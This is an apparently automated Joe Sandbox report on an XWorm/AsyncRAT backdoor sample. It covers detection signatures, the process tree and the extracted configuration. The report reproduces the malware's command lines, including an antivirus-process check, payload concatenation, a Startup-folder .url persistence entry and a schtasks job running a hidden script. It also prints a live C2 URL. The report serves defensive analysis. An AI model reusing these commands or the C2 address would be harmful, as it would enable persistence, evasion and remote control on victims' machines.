Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Overview

General Information

Sample name:SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
Analysis ID:1417469
MD5:63b3dd980ac9a06fd167b0df8121c979
SHA1:eb2737c8940e03d64c8b6e3ff59db07a1a1ec4a0
SHA256:44d97e36a72d87c6b928ccc6ec05a80672bcbf65fc357e0e4ac20ecdd11e837e
Tags:exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Sample uses string decryption to hide its real strings
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file does not import any functions
PE file overlay found
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Tries to load missing DLLs
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe (PID: 3720 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe" MD5: 63B3DD980AC9A06FD167B0DF8121C979)
    • cmd.exe (PID: 6580 cmdline: "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5096 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5428 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 3640 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5608 cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5652 cmdline: cmd /c md 23855 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 6332 cmdline: cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pif MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 2104 cmdline: cmd /c copy /b Stream + Keyboard 23855\R MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Telecom.pif (PID: 6936 cmdline: 23855\Telecom.pif 23855\R MD5: 62D09F076E6E0240548C2F837536A46A)
        • cmd.exe (PID: 5396 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & echo URL="C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2008 cmdline: cmd /c schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 5868 cmdline: schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F MD5: 48C2FE20575769DE916F48EF0676A965)
        • RegAsm.exe (PID: 2056 cmdline: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 1180 cmdline: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • WerFault.exe (PID: 2260 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 1068 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • PING.EXE (PID: 6188 cmdline: ping -n 5 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • MpCmdRun.exe (PID: 5192 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
        • conhost.exe (PID: 3628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 6772 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • EcoScape.pif (PID: 6444 cmdline: "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A" MD5: 62D09F076E6E0240548C2F837536A46A)
  • wscript.exe (PID: 2232 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • EcoScape.pif (PID: 1652 cmdline: "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A" MD5: 62D09F076E6E0240548C2F837536A46A)
  • wscript.exe (PID: 5112 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • EcoScape.pif (PID: 5580 cmdline: "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A" MD5: 62D09F076E6E0240548C2F837536A46A)
  • cleanup
{"C2 url": "https://pastebin.com/raw/Dh8E7H3R", "Aes key": "<123456789>", "Install file": "USB.exe"}
SourceRuleDescriptionAuthorStrings
0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x75c9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x105d1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x7666:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x1066e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x777b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x10783:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x7277:$cnc4: POST / HTTP/1.1
    • 0x1027f:$cnc4: POST / HTTP/1.1
    0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x6e29:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x6ec6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x6fdb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x6ad7:$cnc4: POST / HTTP/1.1
      0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 17 entries
        SourceRuleDescriptionAuthorStrings
        11.3.Telecom.pif.4552c30.2.unpackJoeSecurity_XWormYara detected XWormJoe Security
          11.3.Telecom.pif.4552c30.2.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x5ba1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x5c3e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x5d53:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x584f:$cnc4: POST / HTTP/1.1
          11.3.Telecom.pif.4552c30.3.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
            11.3.Telecom.pif.4552c30.3.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x79a1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x7a3e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x7b53:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x764f:$cnc4: POST / HTTP/1.1
            11.3.Telecom.pif.3ae5b58.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
              Click to see the 17 entries

              System Summary

              barindex
              Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe, ParentCommandLine: 23855\Telecom.pif 23855\R, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif, ParentProcessId: 6936, ParentProcessName: Telecom.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe, ProcessId: 2056, ProcessName: RegAsm.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F, CommandLine: schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2008, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F, ProcessId: 5868, ProcessName: schtasks.exe
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js", ProcessId: 6772, ProcessName: wscript.exe
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: 23855\Telecom.pif 23855\R, CommandLine: 23855\Telecom.pif 23855\R, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif, NewProcessName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif, OriginalFileName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6580, ParentProcessName: cmd.exe, ProcessCommandLine: 23855\Telecom.pif 23855\R, ProcessId: 6936, ProcessName: Telecom.pif
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F, CommandLine: schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2008, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F, ProcessId: 5868, ProcessName: schtasks.exe
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js", ProcessId: 6772, ProcessName: wscript.exe

              Data Obfuscation

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 5396, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": "https://pastebin.com/raw/Dh8E7H3R", "Aes key": "<123456789>", "Install file": "USB.exe"}
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeVirustotal: Detection: 21%Perma Link
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeReversingLabs: Detection: 21%
              Source: 11.3.Telecom.pif.4552c30.3.raw.unpackString decryptor: https://pastebin.com/raw/Dh8E7H3R
              Source: 11.3.Telecom.pif.4552c30.3.raw.unpackString decryptor: <123456789>
              Source: 11.3.Telecom.pif.4552c30.3.raw.unpackString decryptor: <Xwormmm>
              Source: 11.3.Telecom.pif.4552c30.3.raw.unpackString decryptor: ASGARD
              Source: 11.3.Telecom.pif.4552c30.3.raw.unpackString decryptor: USB.exe
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: RegAsm.pdbRegAsm.pdbpdbAsm.pdbicrosoft\Windows\INetCache\23855\RegAsm.pdb4 source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb89 source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.PDBR$ source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdbh source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: n.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000021.00000000.1476146946.00000000001B2000.00000002.00000001.01000000.0000000B.sdmp, RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp, RegAsm.exe.11.dr
              Source: Binary string: \??\C:\Windows\exe\RegAsm.pdbmV[ source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: nC:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb89\System.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\RegAsm.pdbpdbAsm.pdblT source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdbv* source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.pdb source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ##.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.pdbwF= source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: RegAsm.pdbw source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\RegAsm.pdbV= source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000021.00000000.1476146946.00000000001B2000.00000002.00000001.01000000.0000000B.sdmp, RegAsm.exe.11.dr
              Source: Binary string: symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\exe\RegAsm.pdbnVR source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.pdbs source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: n,C:\Windows\RegAsm.pdbpdbAsm.pdbI source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeCode function: 0_2_00406850 FindFirstFileW,FindClose,0_2_00406850
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeCode function: 0_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C26
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004AE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_004AE472
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004AD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_004AD921
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004ADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_004ADC54
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004BA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_004BA087
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004BA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_004BA1E2
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004BA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_004BA570
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_0047C622 FindFirstFileExW,11_2_0047C622
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004B66DC FindFirstFileW,FindNextFileW,FindClose,11_2_004B66DC
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004B7333 FindFirstFileW,FindClose,11_2_004B7333
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004B73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_004B73D4
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior

              Networking

              barindex
              Source: Malware configuration extractorURLs: https://pastebin.com/raw/Dh8E7H3R
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
              Source: unknownDNS traffic detected: query: sCMixbVNmKacbXAnMNdtVVILqF.sCMixbVNmKacbXAnMNdtVVILqF replaycode: Name error (3)
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004BD889 InternetReadFile,SetEvent,GetLastError,SetEvent,11_2_004BD889
              Source: unknownDNS traffic detected: queries for: sCMixbVNmKacbXAnMNdtVVILqF.sCMixbVNmKacbXAnMNdtVVILqF
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
